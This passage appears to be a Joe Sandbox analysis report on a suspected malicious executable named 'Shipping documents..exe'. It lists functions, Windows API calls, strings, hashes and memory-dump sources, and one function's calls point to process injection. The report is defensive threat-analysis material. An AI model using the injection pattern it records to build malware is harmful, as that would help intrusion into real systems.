                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: Error:
                                                                                                          • API String ID: 4104443479-232661952
                                                                                                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                          Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Shipping documents..exe,0040F545,C:\Users\user\Desktop\Shipping documents..exe,004A90E8,C:\Users\user\Desktop\Shipping documents..exe,?,0040F545), ref: 0041013C
                                                                                                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                          • String ID: X$pWH
                                                                                                          • API String ID: 85490731-941433119
                                                                                                          • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                          • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                          • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                          • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                          Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 00401B57
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                          • String ID: @EXITCODE
                                                                                                          • API String ID: 2734553683-3436989551
                                                                                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                          Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          • C:\Users\user\Desktop\Shipping documents..exe, xrefs: 00410107
                                                                                                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strcat
                                                                                                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 1765576173-992733843
                                                                                                          • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                          • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                                                          • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                                                                          • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                                                          Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1794320848-0
                                                                                                          • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                          • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                          • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                          • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                          Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 0043214B
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • _malloc.LIBCMT ref: 0043215D
                                                                                                          • _malloc.LIBCMT ref: 0043216F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 680241177-0
                                                                                                          • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                          • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                          • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                                                                          • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                          Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                          • String ID:
                                                                                                          • API String ID: 4217535847-0
                                                                                                          • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                          • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                          • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                          • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                          Function 00402880 Relevance: 3.5, APIs: 2, Instructions: 463COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2388904642-0
                                                                                                          • Opcode ID: d6ae93e5dde68d5490d0e2d128654d5bf3222c8de25bdfd3a5c53e2991646669
                                                                                                          • Instruction ID: c9d0c8d414f76a6b08ea65189b173eda5e9afecf2ea9a4a3f4bd99c20d85b193
                                                                                                          • Opcode Fuzzy Hash: d6ae93e5dde68d5490d0e2d128654d5bf3222c8de25bdfd3a5c53e2991646669
                                                                                                          • Instruction Fuzzy Hash: 37F1BE75A001099BCB14EF55CA895EEB375EF04304F60443BE905772E1DBBCAE86CB9A
                                                                                                          Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 004678F7
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__wsplitpath_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 4163294574-0
                                                                                                          • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                          • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                          • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                                                                          • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                          Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                            • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                          • _strcat.LIBCMT ref: 0040F786
                                                                                                            • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                            • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3199840319-0
                                                                                                          • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                                                          • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                          • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                                                                          • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                          Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                          • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                          Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2800547568-0
                                                                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                          Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __lock_file.LIBCMT ref: 00415012
                                                                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2999321469-0
                                                                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                          Function 03EB3EE5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03EB46A3
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EB4739
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EB475B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2124146446.0000000003EB2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EB2000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3eb2000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                          • Instruction ID: 91a40e4d533a72f6cd495741f20d78b3c302fe54aeb2d676bd1863ec258f84d1
                                                                                                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                          • Instruction Fuzzy Hash: 2512EF24E14658C6EB24DF60D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
                                                                                                          Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
